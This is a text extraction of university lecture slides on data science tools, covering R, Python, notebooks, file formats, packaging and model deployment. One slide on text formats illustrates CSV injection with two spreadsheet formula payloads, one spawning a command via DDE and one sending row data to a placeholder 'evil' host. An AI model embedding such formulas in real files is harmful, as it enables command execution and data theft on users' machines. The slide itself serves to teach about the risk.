Advanced Analytics in Business [D0S07a] Big Data Platforms & - - PowerPoint PPT Presentation
Advanced Analytics in Business [D0S07a] Big Data Platforms & - - PowerPoint PPT Presentation
Advanced Analytics in Business [D0S07a] Big Data Platforms & Technologies [D0S06a] Data Science Tools Overview In-memory analytics Python and R More on visualization The road to big data Notebooks and development environments A word on
Overview
In-memory analytics Python and R More on visualization The road to big data Notebooks and development environments A word on file formats A word on packaging and versioning systems Model deployment
2
In-memory Analytics
3
The landscape is incredibly complex
4
Amazon Cloudera Datameer DataStax Dell Oracle IBM MapR Pentaho Databricks Microsoft Hortonworks EMC2 “My data lake versus yours” There’s always “roll your own” Open source, or walled garden? Support, features, speed of upgrades?
The situation has stabilized a bit (the champions have settled), but does it matter?
Heard about Hadoop? Spark? H2O?
Many vendors with their “big data and analytics” stack 5
Infrastructure
“Big Data” “Integration” “Architecture” NoSQL and NewSQL “Streaming”
Two sides emerge
6
Analytics
“Data Science” “Machine Learning” “AI”
But also still: BI and Visualization
Two sides emerge
7
There’s a difference
8
In-memory analytics
Your data set fits in memory The assumption of many tools
SAS, SPSS, MatLAB R, Python, Julia
Is this really a problem?
Servers with 512GB of RAM have become relatively cheap Cheaper than a HDFS cluster (especially in today’s cloud environment) Implementation makes a difference (representation of data set in memory) If your task is unsupervised or supervised modeling, you can apply sampling Some algorithms can work in online / batch mode
9
Python and R
10
The big two
The “big two” in modern data science: Python and R
Both have their advantages Others are interesting too (e.g. Julia), but still less adopted
Not (really) due to the language itself
Thanks to their huge ecosystem: many packages for data science available “Python is the second best language for everything”
Vendors such as SAS and SPSS remain as well
But bleeding-edge algorithms or techniques found in open-source first
11
Analytics with R
Native concept of a “data frame”: a table in which each column contains measurements on one variable, and each row contains one case Unlike a matrix, the data you store in the columns of a data frame can be of various types I.e., one column might be a numeric variable, another might be a factor, and a third might be a character variable. All columns have to be the same length (contain the same number of data items, although some of those data items may be missing values)
Fun read: Is a Dataframe Just a Table?, Yifan Wu, 2019 12
Analytics with R
R is great thanks to its ecosystem
Hadley Wickham: Chief Scientist at RStudio, and an Adjunct Professor of Statistics at the University of Auckland, Stanford University, and Rice University Data Science “tidyverse” ggplot2 for visualising data dplyr for manipulating data tidyr for tidying data stringr for working with strings lubridate for working with date/times
https://www.tidyverse.org/
Data Import readr for reading .csv and fwf files readxl for reading .xls and .xlsx files haven for SAS, SPSS, and Stata files (also: “foreign” package) httr for talking to web APIs rvest for scraping websites xml2 for importing XML files
Concept of “tidy” data and operations 13
Modern R
Learning R today? Make sure to use “modern R” principles
tidyverse should be the first package you install Especially thanks to dplyr , tidyr , stringr , and lubridate dplyr implements a verb-based data manipulation language
Works on normal data frames but can also work with database connections (already a simple way to solve the mid-to-big sized data issue) Verbs can be piped together, similar to a Unix pipe operator
flights %>% select(year, month, day) %>% arrange(desc(year)) %>% head
14
Modern R
delay <- flights %>% group_by(tailnum) %>% summarise(count = n(), dist = mean(distance, na.rm = TRUE), delay = mean(arr_delay, na.rm = TRUE)) delay %>% filter(count > 20, dist < 2000) %>% ggplot(aes(dist, delay)) + geom_point(aes(size = count), alpha = 1/2) + geom_smooth() + scale_size_area()
Also see: https://www.rstudio.com/resources/cheatsheets/ 15
Modeling with R
Virtually any unsupervised or supervised algorithm is implemented in R as a package The caret package (short for Classification And REgression Training) is a set of functions that attempt to streamline the process for creating predictive models. The package contains tools for:
Data splitting Pre-processing Feature selection Model tuning using resampling Variable importance estimation
Caret depends on other packages to do the actual modeling, and wraps these to offer a unified interface
You can just use the original package as well if you know what you want Still widely used
16
Modeling with R
require(caret) require(ggplot2) require(randomForest) training <- read.csv("train.csv", na.strings=c("NA","")) test <- read.csv("test.csv", na.strings=c("NA","")) # Invoke caret with random forest and 5-fold cross validation rf_model <- train(TARGET~., data=training, method="rf", trControl=trainControl(method="cv",number=5), ntree=500) # Other parameters can be passed here print(rf_model) ## Random Forest ## ## 5889 samples ## 53 predictors ## 5 classes: 'A', 'B', 'C', 'D', 'E' ## ## No pre-processing ## Resampling: Cross-Validated (5 fold) ## ## Summary of sample sizes: 4711, 4712, 4710, 4711, 4712 ## ## Resampling results across tuning parameters: ## ## mtry Accuracy Kappa Accuracy SD Kappa SD ## 2 1 1 0.006 0.008 ## 27 1 1 0.005 0.006 ## 53 1 1 0.006 0.007 ## ## Accuracy was used to select the optimal model using the largest value. ## The final value used for the model was mtry = 27.
17
Modeling with R
print(rf_model$finalModel) ## ## Call: ## randomForest(x = x, y = y, mtry = param$mtry, proximity = TRUE, ## allowParallel = TRUE) ## Type of random forest: classification ## Number of trees: 500 ## No. of variables tried at each split: 27 ## ## OOB estimate of error rate: 0.88% ## Confusion matrix: ## A B C D E class.error ## A 1674 0 0 0 0 0.00000 ## B 11 1119 9 1 0 0.01842 ## C 0 11 1015 1 0 0.01168 ## D 0 2 10 952 1 0.01347 ## E 0 1 0 5 1077 0.00554
18
Modeling with R
The mlr package is an alternative to caret
R does not define a standardized interface for all its machine learning algorithms The mlr package provides infrastructure so that you can focus on your experiments The framework provides supervised methods like classification, regression and survival analysis along with their corresponding evaluation and optimization methods, as well as unsupervised methods like clustering The package is connected to the OpenML R package and its online platform, which aims at supporting collaborative machine learning online and allows to easily share datasets as well as machine learning tasks, algorithms and experiments in order to support reproducible research mlr3 : https://mlr3.mlr-org.com/
Newer, though gaining uptake 19
Modeling with R
library(mlr3) set.seed(1) task_iris = TaskClassif$new(id = "iris", backend = iris, target = "Species") learner = lrn("classif.rpart", cp = 0.01) train_set = sample(task_iris$nrow, 0.8 * task_iris$nrow) test_set = setdiff(seq_len(task_iris$nrow), train_set) # train the model learner$train(task_iris, row_ids = train_set) # predict data prediction = learner$predict(task_iris, row_ids = test_set) # calculate performance prediction$confusion ## truth ## response setosa versicolor virginica ## setosa 11 0 0 ## versicolor 0 12 1 ## virginica 0 0 6 measure = msr("classif.acc") prediction$score(measure) ## classif.acc ## 0.9666667
20
Modeling with R
The modelr package provides functions that help you create elegant pipelines when modelling
By Hadley Wickham Mainly for simple regression models
More information: http://r4ds.had.co.nz/
Modern R approach Starts simple – linear and visual models Good introduction
21
ggplot2 reigns supreme
By Hadley Wickham
Uses a “grammar of graphics” approach
A grammar of graphics is a tool that enables us to concisely describe the components of a graphic An abstraction which makes thinking, reasoning and communicating graphics easier Such a grammar allows us to move beyond named graphics (e.g., the “scatterplot”) and gain insight into the deep structure that underlies statistical graphics Original idea: Wilkinson (2006)
ggvis : based on ggplot2 and built on top of vega (a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs)
Also declaratively describes data graphics Different render targets Interactivity: interact in browser, phone, …
Visualizations with R
22
Visualizations with R
shiny : a web application framework for R Construct interactive dashboards
23
Other packages worth noting
Apart from those mentioned elsewhere…
janitor : tools for cleaning data foreign : read in SAS data stringr : work with text lubridate : work with times and dates ROCR : make ROC and other curves (or verification , or pROC , or mltools ) MICE : handle missing data (or naniar ) ROSE : up/down sampling with SMOTE forecast : time series analysis (or prophet ) leaflet : make maps igraph : social network analysis esquisse : drag and drop ggplot2 plot builder (Tableau-style, https://dreamrs.github.io/esquisse/) assertr : assertions on data
24
Analytics with Python
Python itself is not a statistical / scientific language
SciPy is a Python-based ecosystem of open-source software for mathematics, science, and engineering NumPy is the fundamental package for scientific computing with Python
A powerful N-dimensional array object, sophisticated (broadcasting) functions, tools for integrating C/C++ and Fortran code, useful linear algebra, … “Let’s make Python’s arrays fast”
pandas is an open source, BSD-licensed library providing high-performance, easy-to-use data structures and data analysis tools for the Python programming language
Python’s “data frame”, uses NumPy
matplotlib : comprehensive 2d plotting SciPy library: fundamental library for scientific computing
25
Analytics with Python
Image (3d array): 256 x 256 x 3 Scale (1d array): (1) x (1) x 3 Result (3d array): 256 x 256 x 3 A (4d array): 8 x 1 x 6 x 1 B (3d array): (1) x 7 x 1 x 5 Result (4d array): 8 x 7 x 6 x 5
Learning solid Numpy indexing and broadcasting is a superpower When operating on two arrays, NumPy compares their shapes element-
- wise. It starts with the trailing dimensions, and works its way forward.
Two dimensions are compatible when they are equal, or one of them is
- 1. Arrays do not need to have the same number of dimensions, they’re
lined up in a trailing fashion. When either of the dimensions compared is
- ne, the other is used. In other words, dimensions with size 1 are stretched
- r “copied” to match the other.
– https://docs.scipy.org/doc/numpy/user/basics.broadcasting.html
“ “
26
Analytics with Python
import pandas as pd import numpy as np df.sort_values(by='B') A B C D 2013-01-03 -0.861849 -2.104569 -0.494929 1.071804 2013-01-04 0.721555 -0.706771 -1.039575 0.271860 2013-01-01 0.469112 -0.282863 -1.509059 -1.135632 2013-01-02 1.212112 -0.173215 0.119209 -1.044236 2013-01-06 -0.673690 0.113648 -1.478427 0.524988 2013-01-05 -0.424972 0.567020 0.276232 -1.087401
27
Analytics with Python
NumPy itself is clean and very well documented… Pandas’ API is a bit of a mess
“Minimally Sufficient Pandas”: https://medium.com/dunder-data/minimally-sufficient-pandas- a8e67f2a2428 E.g. on the different ways to index:
.loc is primarily label based ( dataframe.loc['a'] ), but may also be used with a boolean array .loc will raise KeyError when the items are not found .iloc is primarily integer position based (from 0 to length-1 of the axis) .ix supports mixed integer and label based access Similarly to .loc, .at provides label based scalar lookups, while, .iat provides integer based lookups analogously to .iloc Oh, and you can still do dataframe.a or dataframe['a'] If df is a sufficiently long DataFrame, then df[1:2] gives the second row, however, df[1] gives an error and df[[1]] gives the second column
There are packages like dplython and pandas-ply , though not widely used Pandas does have strong time-series operators, however 28
Modeling with Python
Modeling offers a better picture
scikit-learn is uncontested in the Python ecosystem
Simple and efficient tools for data mining and data analysis Accessible to everybody, and reusable in various contexts Built on NumPy, SciPy, and matplotlib Open source, commercially usable - BSD license Lots of algorithms implemented Relatively easy to implement your own algorithms
statsmodels
Python library that provides classes and functions for the estimation of many different statistical models, as well as for conducting statistical tests, and statistical data exploration
29
Modeling with Python
from sklearn.datasets import load_iris from sklearn.ensemble import RandomForestClassifier import pandas as pd import numpy as np iris = load_iris() df = pd.DataFrame(iris.data, columns=iris.feature_names) df['is_train'] = np.random.uniform(0, 1, len(df)) <= .75 df['species'] = pd.Factor(iris.target, iris.target_names) train, test = df[df['is_train'] == True], df[df['is_train'] == False] features = df.columns[:4] clf = RandomForestClassifier(n_jobs=2) y, _ = pd.factorize(train['species']) clf.fit(train[features], y) preds = iris.target_names[clf.predict(test[features])] pd.crosstab(test['species'], preds, rownames=['actual'], colnames=['preds'])
30
Modeling with Python
For some things you’ll have to look elsewhere
pystruct handles general structured learning seqlearn handles sequence based learning surprise for recommender engines statsmodels or prophet for time series Deep learning and reinforcement learning both require a rich vocabulary to define an architecture, with deep learning additionally requiring GPUs for efficient computing. However, neither of these fit within the design constraints of scikit-learn
Basic CPU-based artificial neural networks are present, however
Relatively good support to work with textual data though – i.e. many featurization options
scikit-learn tries to provide a unified API for the basic tasks in machine learning, with pipelines and meta-algorithms like grid search to tie everything together
“ “
31
Visualizations with Python
matplotlib : the foundation seaborn : “if matplotlib ‘tries to make easy things easy and hard things possible,’ seaborn tries to make a well-defined set of hard things easy too” ggplot : Python implementation of
- ggplot2. Not a “feature-for-feature
port of ggplot2,” but there’s strong feature overlap Altair : newer library with “pleasant API” bokey : similar yellowbrick Datashader : for massive amounts of data points
Older but fun comparison at: https://dansaber.wordpress.com/2016/10/02/a-dramatic- tour-through-pythons-data-visualization-landscape- including-ggplot-and-altair/ 32
Other packages worth noting
Apart from those mentioned elsewhere…
imbalanced-learn : up/down sampling with SMOTE and friends plotnine : another ggplot -style Python plotting tool tqdm : human friendly progress bars missingno : handle missing data dateparser : handling dates in various formats pyflux : time series analysis (or prophet , or tsfresh ) great_expectations : assertions on data folium : mapping library scikit.ml : multilabel techniques pomegranate : probabilistic models semisup-learn : semi-supervised models
And there are interops packages to work between R and Python as well (e.g.
reticulate )
33
More on Visualization
34
Packaged software and BI
Apart from the libraries mentioned above, there’s also packaged (“business intelligence” software)
E.g. Tableau, Spotfire, PowerBI, Cognos, Qlikview, SAS Visual Analytics, … Just “use” the tool, no hastle of coding and debugging Ease-of-use Limited in functionality Custom design more difficult Has nothing to do with modeling
35
Packaged software and BI
Niche visualization can require niche tools, though
Web analytics (Google, Adobe, SAS) E.g. process mining: (Disco and friends) Graph visualizations: Gephi, NodeXL, sigma.js, Cytoscape Mapping (Leaflet, Folium, kepler.gl, others)
36
Further libraries to be aware of
d3.js : Javascript-library which made famous the concept of “data-driven” documents
D3 allows you to bind arbitrary data to a Document Object Model (DOM), and then apply data-driven transformations to the document For example, you can use D3 to generate an HTML table from an array of numbers. Or, use the same data to create an interactive SVG bar chart with smooth transitions and interaction Direct coupling between data and visualization: changing the data changes the visualisation See: https://github.com/mbostock/d3/wiki/Gallery, http://bl.ocks.org/, http://bl.ocks.org/mbostock and https://bost.ocks.org/mike/
Graphviz: diagram and graph visualizations (serves as the “engine” in many other tools) Plotly: widely used charting library, with Plotly Dash (https://plot.ly/products/dash/) as a great dashboarding tool for Python (great shiny alternative)
37
The Road to Big Data
38
On-GPU analytics
GPU: graphical processing unit
Efficient for massive parallelizable operations (e.g. linear algebra, vector operations) Ecosystem mainly based on Python TensorFlow and PyTorch as the current leaders, with dozens of other libraries: Chainer, mxnet, Sonnet, … Hardware support mainly based on NVIDIA GPU’s with CUDA SDK
Training data can be very large (a million images, for instance), but not necessarily stored or handled in a distributed fashion
“Epoch“: one iteration of training. For small data sets: exposing a learning algorithm to the entire set of training data (the “batch”) “Minibatch” means that the gradient is calculated across a sample before updating weights Can be done in-memory Computation can be distributed, however: often involves distribution over multiple GPUs, though these are separate approaches than Hadoop and friends, e.g. Apache mxnet – and often comes with bottlenecks when used in a networked fashion (so “distributed” often happens by using multiple GPU’s in one machine)
39
On-disk analytics
Even if your data set exceeds the boundaries of memory, there might be an easier way other than big-data oriented setups: the “itermediate” step before going full “big data”
Learn how to use your package correctly (e.g. apply methods instead of slow for loops!) Use a database and SQL Use a better memory representation (e.g. data.table in R) Memory-mapped files (i.e. “disk-scratching”) ff or bigmemory in R (but not that fun) disk.frame : a great new package – https://github.com/xiaodaigh/disk.frame Dask in Python, similar API as pandas
Pandas on Ray (https://ray.readthedocs.io/en/latest/pandas_on_ray.html) is also popular, powerful when combined with modin (https://github.com/modin-project/modin) (“Modin is a DataFrame designed for datasets from 1KB to 1TB+”)
vaex (https://github.com/vaexio/vaex) (works with huge tabular data, process more than a billion
rows/second) Dato (Turi) used to have a great implementation, now open source as Sframe (https://github.com/turi- code/SFrame) and in https://github.com/apple/turicreate – also worth checking out
40
On-disk analytics
import pandas as pd import dask.dataframe as dd df = pd.read_csv('2015-01-01.csv') df = dd.read_csv('2015-*-*.csv') df.groupby(df.user_id).value.mean() df.groupby(df.user_id).value.mean().compute() import graphlab import graphlab.aggregate as agg sf = graphlab.SFrame.read_csv('2018-01-01.csv') sf.groupby(key_columns='user_id', operations={'avg': agg.MEAN('value')})
Nevertheless, most organizations that jumped on the Spark and co. bandwagon would have been better off taking a good look at the above
It could have been solved with a bunch of servers and a (distributed) on-disk library Funny how most of these libraries have adopted the directed acyclic graph (DAG) computing approach initially “rediscovered” by Spark as a way to forego MapReduce, something we’ll talk about later
“Pandas is crashing because I’m trying to work with a 50GB data set” is not really an excuse Careful with this, though. You can end up with Pandas, Dask and Spark code in one spaghetti bowl. Guess how I found that out…
“ “
41
Notebooks and Development Environments
42
Notebooks
Scientific programing in data science is very much concerned with exploration, experimentation, making demos, collaborating, and sharing results
It is this need for experiments, explorations, and collaborations that is addressed by notebooks for scientific computing Notebooks are collaborative web-based environments for data exploration and visualization Similar to a “lab notebook”
The idea of computer notebooks has been around for a long time, starting with the early days of MatLAB and Mathematica in the mid-to-late-80s
Later: SageMath and IPython Today: Jupyter
43
Notebooks
44
Notebooks
The Sage Notebook was released on 24 February 2005 by William Stein
Professor of mathematics at the University of Washington Free and open source software (GNU License), with the initial goal of creating an “open source alternative to Magma, Maple, Mathematica, and MATLAB” Sage is based on Python and focuses on mathematical worksheets Today: not widely used, outdated
The IPython console was started by Fernando Perez circa 2001
From a first attempt to replicate a Mathematica Notebook with 259 lines of code With the Sage Notebook being a reference, Perez had many collaborations with the Sage team
In 2015, the IPython Notebook project became the Jupyter project
The ability to go beyond Python and run several languages (i.e. several “kernels”) in a notebook is at the center of the Jupyter rebirth However, it is not possible to have multiple cells with multiple languages within the same notebook Impressive success and steady growth since 2011
45
Notebooks
46
Notebooks
Other alternatives:
Apache Zeppelin: similar in concept to Jupyter
Apache Zeppelin is build on the JVM while Jupyter is built on Python Zeppelin offers the possibility to mix languages across cells Zeppelin is mainly oriented towards Spark Was originally implemented as they way forward by many Spark-based vendor stacks, though today, we see that Jupyter is the most popular environment, so that most stacks are, or have continued to, including Jupyter
Beaker: designed from the start to be a fully polyglot notebook.
Supports Python, Python3, R, Julia, JavaScript, SQL, Java, Clojure, HTML5, Node.js, C++, LaTeX, Ruby, Scala, Groovy, Kdb Nice idea of mixing languages in the same notebook, but has not really gone anywhere
nteract: for those of you that like to have Jupyter installed as a desktop app
Includes easier ways for styling
47
Notebooks
Jupyter comes with a lot of benefits
Quick iteration, immediate output shown in the notebook Easy to construct “dynamic” reports, by applying your style sheets You can even make them interactive (i.e. through the use of widgets, https://ipywidgets.readthedocs.io/en/latest/examples/Widget%20Basics.html) Many extensions to adjust your workflow “Jupyter Hub” to host a multi user Jupyter environment
E.g. Netflix uses papermill to directly execute and schedule Notebooks
papermill is a tool for parameterizing, executing, and analyzing Jupyter Notebooks https://medium.com/netflix-techblog/scheduling-notebooks-348e6c14cfd6 https://github.com/nteract/papermill
48
Notebooks
But come with a set of issues as well…
Version control can be problematic
Jupyter stores notebooks as one big JSON file, including inputs and outputs Every time you make a change, need to commit the whole file
Code can only be run block-by-block (cell by cell)
Can easily mess up flow of code (non-linear execution) You end up with a notebook, which has newer results above the older results
Code can end up looking fragmented
People start splitting the chunks and forget to put them back together, lose track of the order of the analysis and it all ends up in a big mess
Does not encourage to write modular code
You end up copying code fragments from older, other people’s notebooks
“Executing” a notebook can be difficult
Reproducibility? Export to Python, R?
49
Notebooks
https://docs.google.com/presentation/d/1n2RlMdmv1p25Xy5thJUhkKGvjtV- dkAIsUXP-AL4ffI/edit and https://yihui.name/en/2018/09/notebook-war/:
- 1. Hidden state and out-of-order execution
- 2. Notebooks are difficult for beginners
- 3. Notebooks encourage bad habits
- 4. Notebooks discourage modularity and testing
- 5. Jupyter’s autocomplete, linting, and way of looking up the help are awkward
- 6. Notebooks encourage bad processes
- 7. Notebooks hinder reproducible + extensible science
- 8. Notebooks make it hard to copy and paste into Slack/Github issues
- 9. Errors will always halt execution
- 10. Notebooks make it easy to teach poorly
- 11. Notebooks make it hard to teach well
50
Notebooks
https://colab.research.google.com
51
Notebooks
https://studio.azureml.net/
52
Notebooks
All cloud providers have realized that the best data science environment to offer is simply Python + Jupyter + the possibility to install packages The issues can be solved:
Version control can be problematic
Fixed in many hosted environments Collaboration possible as well Possible to “roll your own”, e.g. through the use of “git hooks”
Code can only be run block-by-block (cell by cell)
Enforce strict guidelines
Does not encourage to write modular code
E.g. see https://github.com/fastai/nbdev
“Executing” a notebook can be difficult
Solution exist to overcome this as well, e.g. papermill
fast.ai is writing a whole book using Jupyter
The takeaway? Notebooks are here to stay
Great tool for exploration, experimentation, development phase of data science, even for showing results in “report” form
53
IDEs
Integrated development environment
Commonly offers much better debugging, code inspection, documentation capabilities RStudio for R
On desktop Or hosted on web server (commercial) Support for Git and others Authoring reports, slide shows Interactive visualizations
Spyder for Python
Copies look and feel of Rstudio Similar: Rodeo
Or IDEs such as PyCharm Or Jupyter Lab
Builds on top of Jupyter Adds panel layout, file view
54
IDEs
https://www.rstudio.com/
55
IDEs
https://www.jetbrains.com/pycharm/
56
IDEs
https://github.com/jupyterlab/jupyterlab
57
IDEs
https://code.visualstudio.com/
58
Getting started
Python
Anaconda Distribution: https://www.continuum.io/downloads Includes Jupyter, Python, data science package repository (also for R)
R
CRAN (base installation): https://cran.r-project.org/ RStudio: https://www.rstudio.com/ Or Jupyter
Hosted (“one click Jupyter”)
Google Colab: https://colab.research.google.com (free) Azure ML Studio: https://studio.azureml.net/ (free) Kaggle Kernels: https://www.kaggle.com/kernels (free) http://paperspace.io/ and https://gradient.paperspace.com/ https://www.floydhub.com/ https://www.crestle.com/ https://www.onepanel.io/ https://www.easyaiforum.cn/ (易学智能) SageMaker, or AWS Google Compute Platform, EC2, Digitalocean… and install yourself
59
A Word on File Formats
60
In which format do we store our data?
You might be used to text-based formats (CSV and friends, or Excel), but there are various concerns at play here:
How fast is it to serialize data (write)? How fast can it be read in? How large is it? Column or row based? Easy to distribute? Easy to modify schema?
61
Text based formats
CSV, TSV, JSON, XML Convenient to exchange with other applications or scripts Human readable Bulky and not efficient to query without reading whole structure in memory first Hard to infer schema Compression applies on file-level Still one of the most common formats
62
Text based formats
UserId,BillToDate,ProjectName,Description,DurationMinutes 1,2017-07-25,Test Project,Flipped the jibbet,60 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240 2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240 UserId,BillToDate,ProjectName,Description,DurationMinutes 1,2017-07-25,Test Project,Flipped the jibbet,60 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240 2,2017-07-25,Important Client, "=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")", 240
http://georgemauer.net/2017/10/07/csv-injection.html 63
Text based formats
64
Sequence files
A persistent data structure for binary key-value pairs “Serialized Java objects” Row-based Commonly used to transfer data in map-reduce jobs (see later) Compression applies on row level Less popular in recent years, not portable
65
Optimized Row Columnar (ROW)
Evolution of the older RCFile Stores collections of rows and within the collection the data is stored in columnar format (combination of row- and column-based) Lightweight indexing Splittable Less popular in recent years
66
Apache AVRO
Widely used as serialization format Row-based, compact binary format Schema is included in the file Supports schema evolution Add, rename and delete columns Compression on record level
https://blog.cloudera.com/blog/2009/11/avro-a-new-format-for-data- interchange/ 67
Apache Parquet
Column-oriented binary file format Efficient when specific columns are queried Common in data science Parquet is built to support very efficient compression and encoding schemes Parquet allows compression schemes to be specified on a per-column level Good support for schema evolution Can add columns at the end
68
SQLite files
Row-oriented file stores Support for multiple tables, schema evolution, SQL querying Integrates nicely with many languages Data sets can become very large
69
HDF5
HDF5 is a data model, library, and file format for storing and managing data Supports an unlimited variety of datatypes, and is designed for flexible and efficient I/O and for high volume and complex data HDF5 is portable and is extensible, allowing applications to evolve in their use of HDF5 A file system within a file Specification is very complex
70
Kudo
Kudu is a storage system for tables of structured data Tables have a well-defined schema consisting of a predefined number of typed columns. Each table has a primary key composed of one or more of its columns Kudu tables are composed of a series of logical subsets of data, similar to partitions in relational database systems, called Tablets Kudu provides data durability and protection against hardware failure by replicating these Tablets to multiple commodity hardware nodes
71
Apache Arrow
Engineers from across the Apache Hadoop community established Arrow as a de-facto standard for columnar in-memory processing and interchange The layout is highly cache-efficient in analytics workloads Not a binary file specification, but a memory representation specification Efficient and fast data interchange between systems without the serialization costs associated with other systems like Thrift, Avro, and Protocol Buffers A flexible structured data model supporting complex types that handles flat tables as well as real-world JSON-like data engineering workloads
72
Feather
A Fast On-Disk Format for Data Frames for R and Python, powered by Apache Arrow Feather is a fast, lightweight, and easy-to-use binary file format for storing data frames. It has a few specific design goals:
Lightweight, minimal API: make pushing data frames in and out of memory as simple as possible Language agnostic: Feather files are the same whether written by Python or R code. Other languages can read and write Feather files, too High read and write performance. When possible, Feather operations should be bound by local disk performance
“One thing that struck us was that while R’s data frames and Python’s pandas data frames utilize very different internal memory representations, they share a very similar semantic model” In discussing Apache Arrow in the context of Python and R, we wanted to see if we could use the insights from feather to design a very fast file format for storing data frames that could be used by both languages. Thus, the Feather format was born
“ “
73
Feather
library(feather) path <- "my_data.feather" write_feather(df, path) df <- read_feather(path) # Analogously, in Python, we have: import feather path = 'my_data.feather' feather.write_dataframe(df, path) df = feather.read_dataframe(path)
74
What to take away from this?
Be prepared to deal with different data sources
AVRO is fast to serialize (write, dump) data and supports schema evolution: great choice for ETL and integration Parquet and Feather are fast to read, query, and analyse data Feather currently a popular choice for data science
Future: Arrow/Feather + Parquet
Feather is not designed for long-term data storage. At this time, we do not guarantee that the file format will be stable between versions Instead, use Feather for quickly exchanging data between Python and R code, or for short-term storage of data frames as part of some analysis Feather is extremely fast. Since Feather does not currently use any compression internally, it works best when used with solid-state drives as come with most of today’s laptop computers Many organisations are adopting a hybrid approach
75
A Word on Packaging and Versioning Systems
76
Packaging
You’ll commonly encounter “package managers” when working in your preferred ecosystem
Management of installs and updates Avoiding conflicts Resolving dependencies
A package manager or package management system is a collection of software tools that automates the process of installing, upgrading, configuring, and removing computer programs for a computer’s operating system in a consistent manner.
“ “
77
Virtual environments
This is commonly combined with a way to set up “virtual environments”: isolated subsystems, each with their own collection packages
The idea is to make your environment reproducible Avoids the “runs on my computer” syndrome
78
In Python and R
R comes with each own package management system, allows to download packages from a repository
E.g. install.packages(...) Virtual environments can be set up using packrat
Python has had a lot of package managers, but the most common one nowadays is pip
Included with Python 3 by default Included with the Anaconda distribution E.g. pip install numpy Virtual environments can be set up using virtualenv
Or you can use conda : Anaconda’s package manager and virtual environment manager in-one
Includes more than just Python packages, also R and other tools are included Hence also allows to set up clean isolated R workspaces Good rule of thumb: a new conda environment for each project https://conda.io/projects/conda/en/latest/user-guide/getting-started.html https://docs.conda.io/projects/conda/en/4.6.0/_downloads/52a95608c49671267e40c689e0bc00ca/conda- cheatsheet.pdf
To isolate a complete environment, virtualization and containerization tools like docker are commonly used as well
79
Versioning systems
Something else to read up on is the use of version control systems
Even a good idea to use this for a “team of one” SVN, CVN, Mercurial, Bazaar Most common one is git , however
Version control systems are a category of software tools that help a software team manage changes to source code over time. Version control software keeps track of every modification to the code in a special kind of
- database. If a mistake is made, developers can turn back the clock and
compare earlier versions of the code to help fix the mistake while minimizing disruption to all team members.
“ “
80
git
GitHub: hosts git repositories for you (free) GitLab: an alternative
Git was created by Linus Torvalds in 2005 for development of the Linux kernel, with other kernel developers contributing to its initial development. As with most other distributed version-control systems, and unlike most client–server systems, every Git directory on every computer is a full- fledged repository with complete history and full version-tracking abilities, independent of network access or a central server. Git is free and open-source software distributed under the terms of the GNU General Public License version 2.
“ “
81
git
GitHub Desktop
82
git
A good way to practice is to put your coding, data science projects, blog even
- n GitHub
E.g. feel free to try this for Assignment 2
Many data science recruiters will look at your GitHub profile to see the (personal) projects you’ve worked and collaborated on 83
Model Deployment
84
Context
Recall from the evaluation session that evaluation doesn’t stop at deployment
Sculley, D., Holt, G., Golovin, D., Davydov, E., Phillips, T., Ebner, D., … & Dennison, D. (2015). Hidden technical debt in machine learning systems. In Advances in neural information processing systems (pp. 2503-2511)
In real-world machine learning systems, only a small fraction is comprised of actual ML code There is a vast array of surrounding infrastructure and processes to support their evolution Many sources of technical debt can accumulate in such systems, some of which are related to data dependencies, model complexity, reproducibility, testing, monitoring, and dealing with changes in the external world
85
Context
A simple straight-through process? 86
Common deployment issues
Lineage of data dependencies
Metadata management Ensuring that data is available to the model at prediction-time This include all pre-processing steps that are applied to the data! Different data sources, one-off data sources used during training
87
Common deployment issues
Deployment context
Will the model be deployed as an API, embedded in a web app, a mobile app, scheduled to run every week, month…? Differences between data science development environment (Jupyter, Anaconda, R…) and I.T. environment (Java, .NET, …) How to keep model changes in sync with application changes?
88
Common deployment issues
Development governance
Is the training code well-documented? How is collaboration, versioning handled? Can the training code be easily reproduced, e.g. to re-train the model periodically? “Runs on my machine phenomenon”
89
Common deployment issues
Model governance
How is the model deployed? A common platform, using containerization or virtualization, ad- hoc? Is versioning support provided for models? Models as data: can output of one model be easily used in other models/projects? Is lineage kept? Is metadata available (e.g. when was the model last updated?)
90
Common deployment issues
Monitoring
Inputs, outputs, and usage! Do we know when the input data is changing, when the output probability changes? Are errors reported and logged?
91
Common deployment issues
Many of these issues are well known in traditional software engineering
Testing, monitoring, logging, structured development processes Continuous development, integration, deployment (CI/CD)
In the context of ML productionization, many of these are hard to apply
ML models degrade silently! (https://towardsdatascience.com/why-machine-learning-models- degrade-in-production-d0f2108e9214, https://www.elastic.co/blog/beware-steep-decline- understanding-model-degradation-machine-learning-models, https://mlinproduction.com/model-retraining/) Data definitions change, people take actions based on model output, other externalities change (different promotions, products, focus…) Models will happily continue to provide predictions, but as concept drift increases, their accuracy and generalization power will decrease over time A solid model governance infrastructure is key!
92
Deployment platforms
Also many in-house solutions: e.g. Uber’s Michelangelo and Manifold, Facebook’s FBLearner flow, Spotify’s Airflow, Netflix’ ML Platform, Airbnb’s Bighead 93
Deployment principles
(Meta)Data management Train-run integration: reproducibility and testing Monitoring, logging and alerting Runtime patterns
94
(Meta)Data management
The issue: during model-development, data sources are typically dispersed and entangled, it is hard to keep track of the data used during a model’s construction. Definitions are not clear are unavailable
A common source of data should be set up and used both during model development and in production Common data preprocessing steps should be incorporated in the data layer instead of being duplicated over different model pipelines Don’t split up the data layer in “raw”, “processed” and “final” stages: data is always raw and never final, focus instead
- n integrating the different sources in a common platform
When using an ad-hoc data source, investigate as early as possible in the development process whether this data source can be ingested in the common layer Consider for every data input whether the data will be available at prediction-time in a timely manner Set up a structured data dictionary containing data definitions and metadata information. This includes data purpose constraint definitions (e.g. GDPR and other regulatory constraints): prevent data elements to be used if not possible Both data and metadata come with versioning: keep historical records available. I.e. you should be able to retrieve the state of the data as when it was during training. This applies to streaming data as well: typically retained in a historical repository as well to be used when (re)training or using models Make sure that predictions of models are ingested in the data layer, if they are to be used as an input for other models
95
Train-run integration: reproducibility and testing
The issue: it is hard to re-train an outdated model, code used during development is in a separate environment and of lower quality than the code that gets deployed in the production environment
